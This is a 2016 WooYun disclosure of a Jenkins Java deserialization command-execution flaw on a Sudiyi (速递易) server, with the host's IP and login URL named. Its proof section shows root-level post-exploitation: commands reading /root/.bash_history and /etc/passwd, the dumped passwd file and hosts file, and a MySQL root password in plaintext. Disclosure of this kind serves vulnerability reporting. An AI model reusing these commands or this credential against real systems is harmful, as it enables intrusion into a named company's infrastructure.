当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0193457

漏洞标题:速递易某系统存在命令执行漏洞

相关厂商:速递易

漏洞作者: 路人甲

提交时间:2016-04-08 12:27

修复时间:2016-05-23 12:30

公开时间:2016-05-23 12:30

漏洞类型:命令执行

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

www.sudiyi.cn

mask 区域 
1.http://**.**.**/loginfrom=%2f_
**********
*****^列化^*****
**********
*****22834b66b949e87956bd.png&qu*****
*****.0.0.1 l*****
*****ops01.s*****
*****.localdoma*****
**********
*****esirable for I*****
*****-localhost *****
*****p6-al*****
*****-allro*****
***** iZ23vc*****
***** iZ23dt*****
**********
*****kins *****
*****rrors.jen*****
***** ruby.s*****
**********
*****egrate to*****
*****ira.su*****
*****archive.*****
*****wnloads.*****
**********
*****o reach *****
*****aven.s*****
**********
*****oading of dl*****
*****-ssl.go*****
**********
*****de&g*****
**********
*****^^^*****
*****bba3d2d5b0511b67a3ac.png&qu*****
**********
*****bash_h*****
***** ^*****
*****tory|gre*****
*****ot -p *****
*****dY10055&l*****
**********
*****些^*****
*****gt;cd*****
2.://**.**.**//203.130.55.95/ws.cdn.baidupcs.com/file/c8403d299a2db4104879372be2ca130bbkt=p2-nb-196&xcode=f3dad2a2733c26fac7d56582f6e916de903efae2841e1696f77424e07ee197d9&fid=3305421553-250528-737258585075065&time=1449799931&sign=FDTAXGERLBH-DCb740ccc5511e5e8fedcff06b081203-B%2BOuxFVHurP5q8k1HAxDua1ffpg%3D&to=lc&fm=Nin,B,M,ny&sta_dx=210&sta_cs=16&sta_ft=zip&sta_ct=6&fm2=Ningbo,B,M,ny&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=1400c8403d299a2db4104879372be2ca130bfdd91aab00000d184675&sl=79495247&expires=8h&rt=sh&r=876939559&mlogid=7988191254902820211&vuk=3473100178&vbdid=2766612220&fin=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&fn=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&slt=pm&uta=0&rtype=1&iv=0&isw=0&dp-logid=7988191254902820211&dp-callid=0.1.1&wshc_tag=0&wsts_tag=566a30fd&wsid_tag=8ba202ac&wsiphost=ipdbm&
3.://**.**.**//203.130.55.95/ws.cdn.baidupcs.com/file/c8403d299a2db4104879372be2ca130bbkt=p2-nb-196&xcode=f3dad2a2733c26fac7d56582f6e916de903efae2841e1696f77424e07ee197d9&fid=3305421553-250528-737258585075065&time=1449799931&sign=FDTAXGERLBH-DCb740ccc5511e5e8fedcff06b081203-B%2BOuxFVHurP5q8k1HAxDua1ffpg%3D&to=lc&fm=Nin,B,M,ny&sta_dx=210&sta_cs=16&sta_ft=zip&sta_ct=6&fm2=Ningbo,B,M,ny&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=1400c8403d299a2db4104879372be2ca130bfdd91aab00000d184675&sl=79495247&expires=8h&rt=sh&r=876939559&mlogid=7988191254902820211&vuk=3473100178&vbdid=2766612220&fin=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&fn=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&slt=pm&uta=0&rtype=1&iv=0&isw=0&dp-logid=7988191254902820211&dp-callid=0.1.1&wshc_tag=0&wsts_tag=566a30fd&wsid_tag=8ba202ac&wsiphost=ipdbm&
*****de&g*****
*****^^*****
*****7aa32f7a4a50f1f9b839.png&qu*****
*****c/pa*****
*****0:root:/roo*****
*****r/sbin:/usr/*****
*****n:/usr/sb*****
*****v:/usr/sb*****
*****nc:/bin:/*****
*****/games:/usr/*****
*****he/man:/usr/*****
*****l/lpd:/usr/*****
*****mail:/usr/s*****
*****ool/news:/us*****
*****spool/uucp:/*****
*****:/bin:/usr*****
*****:/var/www:/us*****
*****r/backups:/us*****
*****ager:/var/list:*****
*****un/ircd:/usr*****
*****tem (admin):/var/li*****
*****:/nonexistent:*****
*****::/var/li*****
*****home/syslo*****
*****:/var/run/d*****
*****ome/ntp:/*****
*****run/sshd:/us*****
*****,:/home/li*****
*****ver,,,:/nonex*****
*****r,,,:/nonexis*****
*****sr/lib/pars*****
*****ment daemon,,,:/var*****
*****,,,:/var/lib/*****
*****:/home/sdy*****
*****ssian JIRA:*****
*****assian JIRA*****
*****assian JIRA*****
*****assian JIRA*****
*****assian JIRA*****
*****ian Confluence:*****
*****cod*****

漏洞证明:

www.sudiyi.cn
http://112.124.60.190:8081/login?from=%2f
jenkins java反序列化命令执行

111.png


127.0.0.1 localhost
127.0.0.1 devops01.sudiyi.cn
127.0.1.1	localhost.localdomain	localhost
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.168.208.86 iZ23vcyqu9dZ
10.160.62.232 iZ23dtey008Z
# For Jenkins Update
199.193.196.24	mirrors.jenkins-ci.org
10.168.66.248 ruby.sudiyi.cn
# For jenkins integrate to jira server
127.0.0.1 jira.sudiyi.cn
140.211.11.131 archive.apache.org
54.230.125.6 downloads.gradle.org
# For jenkins to reach maven repo
127.0.0.1 maven.sudiyi.cn
# Temporarily disable loading of dl-ssl.google.com
#127.0.0.1 dl-ssl.google.com


root权限

111.png


cat /root/.bash_history
mysql 密码

history|grep mysql
mysql -u root -p sdY10055
mysql -u root -psdY10055


cdn的一些信息

cd /tmp/
weget 'http://203.130.55.95/ws.cdn.baidupcs.com/file/c8403d299a2db4104879372be2ca130b?bkt=p2-nb-196&xcode=f3dad2a2733c26fac7d56582f6e916de903efae2841e1696f77424e07ee197d9&fid=3305421553-250528-737258585075065&time=1449799931&sign=FDTAXGERLBH-DCb740ccc5511e5e8fedcff06b081203-B%2BOuxFVHurP5q8k1HAxDua1ffpg%3D&to=lc&fm=Nin,B,M,ny&sta_dx=210&sta_cs=16&sta_ft=zip&sta_ct=6&fm2=Ningbo,B,M,ny&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=1400c8403d299a2db4104879372be2ca130bfdd91aab00000d184675&sl=79495247&expires=8h&rt=sh&r=876939559&mlogid=7988191254902820211&vuk=3473100178&vbdid=2766612220&fin=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&fn=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&slt=pm&uta=0&rtype=1&iv=0&isw=0&dp-logid=7988191254902820211&dp-callid=0.1.1&wshc_tag=0&wsts_tag=566a30fd&wsid_tag=8ba202ac&wsiphost=ipdbm'
wegt 'http://203.130.55.95/ws.cdn.baidupcs.com/file/c8403d299a2db4104879372be2ca130b?bkt=p2-nb-196&xcode=f3dad2a2733c26fac7d56582f6e916de903efae2841e1696f77424e07ee197d9&fid=3305421553-250528-737258585075065&time=1449799931&sign=FDTAXGERLBH-DCb740ccc5511e5e8fedcff06b081203-B%2BOuxFVHurP5q8k1HAxDua1ffpg%3D&to=lc&fm=Nin,B,M,ny&sta_dx=210&sta_cs=16&sta_ft=zip&sta_ct=6&fm2=Ningbo,B,M,ny&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=1400c8403d299a2db4104879372be2ca130bfdd91aab00000d184675&sl=79495247&expires=8h&rt=sh&r=876939559&mlogid=7988191254902820211&vuk=3473100178&vbdid=2766612220&fin=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&fn=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&slt=pm&uta=0&rtype=1&iv=0&isw=0&dp-logid=7988191254902820211&dp-callid=0.1.1&wshc_tag=0&wsts_tag=566a30fd&wsid_tag=8ba202ac&wsiphost=ipdbm'


根目录

111.png


cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
ntp:x:103:109::/home/ntp:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
live:x:1000:1000:,,,:/home/live:/bin/bash
mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false
nginx:x:106:115:nginx user,,,:/nonexistent:/bin/false
parsoid:x:107:116::/usr/lib/parsoid:/bin/false
colord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
jenkins:x:109:119:Jenkins,,,:/var/lib/jenkins:/bin/bash
sdyops:x:1001:1001::/home/sdyops:/bin/bash
jira:x:1002:1002:Atlassian JIRA:/home/jira:
jira1:x:1003:1003:Atlassian JIRA:/home/jira1:
jira2:x:1004:1004:Atlassian JIRA:/home/jira2:
jira3:x:1005:1005:Atlassian JIRA:/home/jira3:
jira4:x:1006:1006:Atlassian JIRA:/home/jira4:
confluence:x:1007:1007:Atlassian Confluence:/home/confluence:


修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)